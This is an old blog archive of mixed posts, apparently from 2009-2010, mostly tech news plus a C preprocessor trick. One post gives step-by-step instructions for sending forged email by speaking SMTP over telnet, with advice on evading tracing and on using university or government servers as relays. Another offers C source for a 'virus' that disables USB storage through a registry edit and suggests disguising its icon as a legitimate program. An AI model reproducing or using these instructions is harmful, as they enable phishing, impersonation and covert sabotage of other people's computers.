Tuesday, January 12, 2010

How to send Fake mail on your own?

I am not responsible for anything You are responsible for all your actions.I am just giving here to share the knowledge don't try it on others because you can be tracked down too...

http://www.ku.ac.th/magazine_online/image/spam.gifHow can you send fake mail without using any website to send fake mail.Why can't we send it on our own had your thought of it?I think you had thought of it atleast once.Me too.....
So i searched all over the net and tried it for my self and i mailed it to my email account.I got the mail but it was in spam folder...The technique i am going to show worked a long time ago...But now its not working to send it directly i don't why but the mail will be delivered to the spam folder.Once if they make it as the mail is not spam then they will get mail directly....
Overview SMTP (Simple Mail Transfer Protocol) is the protocol by which Internet mail is sent. SMTP servers use this protocol to communicate with other servers or mail clients. However, by telneting directly to a mail server and manually speaking SMTP, one can easily send mail from any address specified - meaning that mail can be sent from fake addresses while the sender's real address is untraceable. What is Needed? All that you need is a generic telnet client. Local echo should be turned on so you can see what you type. Also, it is important to note that SMTP servers do not handle backspaces, so you must type everything correctly. How do I Start? Telnet to port 25 of your target SMTP server (more on SMTP servers selection below). The server should respond with a generic welcome message. You will type HELO domain.name. Use any domain name you wish as most servers do not check the name against the IP you are telneting from. Type MAIL FROM: . This is where the message will appear to be from. Next, type RCPT TO: . This specifies who will receive the message. Type DATA and type the body of your message. To send the message, enter a line with only a period. Type QUIT to disconnect. Sample Session 220 hq.af.mil Sendmail 4.1/Mork-1.0 ready at Thu, 14 Mar 96 00:26:46 EST HELO prometheus.com 250 hq.af.mil Hello prometheus.com (prometheus.com), pleased to meet you MAIL FROM: 250 ... Sender ok RCPT TO: 250 ... Recipient ok DATA 354 Enter mail, end with "." on a line by itself This is the body of my message. . 250 Mail accepted QUIT 221 hq.af.mil delivering mail What about message subjects? The subject, date, to, etc. are part of the DATA area. After the DATA command, start with date and continue is the fashion illustrated by the example code below. Make sure there are no mistakes, because the first mistake will cause the data to appear in the body of the message, not header. It is interesting, because these fields take precedence over the MAIL FROM: and RCPT TO: when displaying. A message can be routed to a person even though the message itself appears to be addressed to someone else. The key is to type VERY carefully. Example: DATA Date: 23 Oct 81 11:22:33 From: SMTP@HOSTY.ARPA To: JOE@HOSTW.ARPA Subject: Mail System Problem Sorry JOE, your message to SAM@HOSTZ.ARPA lost. HOSTZ.ARPA said this: . End Example Can my mail be traced? Yes, the IP address you mailed from can be traced if you are not careful. All mail will show a line in the header listing the IP address that you originally telneted from. If the person you are sending mail to doesn't know much about IP's and the like, you shouldn't worry too much. Furthermore, depending on your the nature of your connection, there are different implications. For instance, if you have a direct connection, you can be easily traced by your IP address. On the other hand, if you have a dial-in connection or service such as AOL, you will not have a defined IP address. You will be assigned a temporary one. The only way your mail can be traced with this type of connection is to check against the dial in service's system logs. The take-home message is that you are safe with this type of connection unless you do something really stupid. Finally, the best case scenario is a public access terminal with no logging. This type connection is untraceable. Author's Note: I have found some servers that don't log IP. Read No IP SMTP Server What SMTP servers can I use? An easy (but hit-or-miss) way to find random SMTP servers is to look at web addresses on Yahoo! or another search engine. Universities and government agencies are always good choices. Find a URL and telnet to port 25. If you get a response, you have located an available server. 95% of servers will accept your mail. The others will not allow external mail forwarding for security reasons. Always test the server first. OR Check Hunter's List of Usable SMTP Servers. All servers on this list have been tested and will work. A hyptertext interface makes it easy to use the servers.

Thursday, November 26, 2009

Google herds coders into Chrome extensions gallery

Google is corralling developers into uploading their Chrome browser extensions to a new gallery that hasn’t been opened up to testers yet.
That will change for a select bunch of coding guinea pigs in the next few days, said Mountain View.
In the meantime, those developers who want to slot their add-ons into Chrome will be required to sign up to Google’s Ts&Cs before uploading their extensions into the gallery.
Under those terms, Google has the power to examine a developer’s extension before it gets published.
Chrome extensions Limited beta release
“For most extensions, the review process is fully automated,” wrote Google software engineer Lei Zheng on firm’s Chromium blog yesterday.
“The only extensions we'll review manually are those that include an NPAPI component and all content scripts that affect ‘file://’ URLs. For security reasons, developers of these types of extensions will need to provide some additional information before they can post them in the gallery.”
Just last week Mozilla confirmed plans to debut a "lockdown" feature in Firefox 3.6 to force third party application developers to toe the line by preventing them from adding their own code into the browser's components directory. ®

Thursday, November 19, 2009

6 Billion Others

6billion
6 Billion Others: Portraits of Humanity from Around the World 
is a project completed in January 2009 (?), by Yann Arthus Bertrand and is translated into a website and a book. See and interact with faces of people from all over the worldand watch and hear mini biographical excerpts from these people, answering questions like “What does love mean to you?” “What do you hope to teach your children?” “What does happy mean to you?”. It is a project that recognizes the universal life goals, desires and needs of people across the world as well as the cultural differences, opportunities and sometimes heartbreaking challenges that come from individual perspective and living in one place or another.

C Program Without a Main Function

How to write a C program without a main function?.Is it possible to do that.Yes there can be a C program without a main function.Here’s the code of the program without a main function…

#include
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)
int begin()
{
printf(” hello “);
}
Does the above program run without the main function? Yes, the above program runs perfectly fine even without a main function.But how,whats the logic behind it? How can we have a C program working without main ?
Here we are using preprocessor directive #define with arguments to give an impression that the program runs without main.But in reality it runs with a hidden main function.
The ‘##‘ operator is called the token pasting or token merging operator.That is we can merge two or more characters with it.
NOTE: A Preprocessor is program which processess the source code before compilation.
Look at the 2nd line of program-
#define decode(s,t,u,m,p,e,d) m##s##u##t
What is the preprocessor doing here.The macro decode(s,t,u,m,p,e,d) is being expanded as “msut” (The ## operator merges m,s,u & t into msut).The logic is when you pass (s,t,u,m,p,e,d) as argument it merges the 4th,1st,3rd & the 2nd characters(tokens).
Now look at the third line of the program-
#define begin decode(a,n,i,m,a,t,e)
Here the preprocessor replaces the macro “begin” with the expansion decode(a,n,i,m,a,t,e).According to the macro definition in the previous line the argument must de expanded so that the 4th,1st,3rd & the 2nd characters must be merged.In the argument (a,n,i,m,a,t,e) 4th,1st,3rd & the 2nd characters are ‘m’,'a’,'i’ & ‘n’.
So the third line “int begin” is replaced by “int main” by the preprocessor before the program is passed on for the compiler.That’s it…
The bottom line is there can never exist a C program without a main function.Here we are just playing a gimmick that makes us beleive the program runs without main function, but actually there exista a hidden main function in the program.Here we are using the proprocessor directive to intelligently replace the word begin” by “main” .In simple words int begin=int main.

A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.


Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
Virus to disable USB ports1.
//block_usb.c
#include
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
}


2.
//unblock_usb.c
#include

void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
}




3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post

Wednesday, November 11, 2009

Samsung launches Open Source mobile OSSamsung launches Open Source mobile OS


Bangalore: Samsung has launched its own operating system (OS) for mobile to compete against other open source platform, Symbian and Google Android. The OS is named Bada, which means 'ocean' in Korean, is an open platform that Samsung is hoping will attract both customers and developers to its devices. The company has not released several details about Bada, but said it will have a strong user interface, be developer friendly, and enable mobile operators to offer various content and services, according to InformationWeek.



The company also said it encourages integrating common experiences and functions across applications, which means core functionalities like the dialer, messaging, and address book will be open to developers. Users will also eventually be able to download Bada applications over the air from Samsung's Application Store. "By opening Samsung's mobile platforms we will be able to provide rich mobile experiences on an increasing number of accessible smartphones," said Hosoo Lee, Executive Vice President at Samsung, in a statement.

Samsung is jumping into the already crowded and highly competitive area of mobile platforms and will be competing against Microsoft, Google, Symbian, Apple, Research In Motion, and Palm.

Samsung also said the Bada software development kit will be released in December, and handsets with the OS are expected to arrive in 2010. Samsung has not made it clear whether the company will continue to manufacture smartphones with Android or Windows Mobile once Bada is ready to go.

Google plans to restructure programming with Go

Bangalore: Google software luminaries such as Unix Co-creator Ken Thompson believe that they can help boost both computing power and programmers' abilities with an experimental programming language project called Go.

The language has been tested internally at Google, but is still at an experimental stage, so the search giant is releasing it as open-source code in the hope that it will get help with its future development. "We developed Go because we had become a bit frustrated with how difficult software development has become in the last 10 years or so," said Rob Pike, Principal Software Engineer at Google.



So far, Google's Go project consists of the programming language, compilers to convert what programmers write into software that computers can run and a runtime package that endows Go programs with a number of built-in features. It's most similar to C and C++, but, Pike said, it employs modern features and has enough versatility that it could even be used within web browsers, reports CNET News.

Go aims to improve on the way existing programming languages manage dependencies, which are the software components that applications re-use, such as libraries, Pike said. The language is also designed to handle multiprocessor work particularly well, thanks to its concurrent programming model.

Google started working on Go about two years ago and devoted a team to work on it full time about a year ago. It was conceived as a language for systems programming, such as web servers, storage systems and databases. However, Google is open to seeing it branch out into other areas.

At this point, Go is not used in any user-facing Google service or application, since it still has to mature, which is where external programmers come into the picture. "We need better libraries and tools, and the open-source community is great at helping you with things like that," Pike said.

By creating a new programming language, Google continues making inroads into the realm of computing building blocks, prompted by a sense of urgency at making them better. This motivation has also led Google to embark on developing the Android mobile operating system, the Chrome PC browser and the still-unreleased Chrome operating system.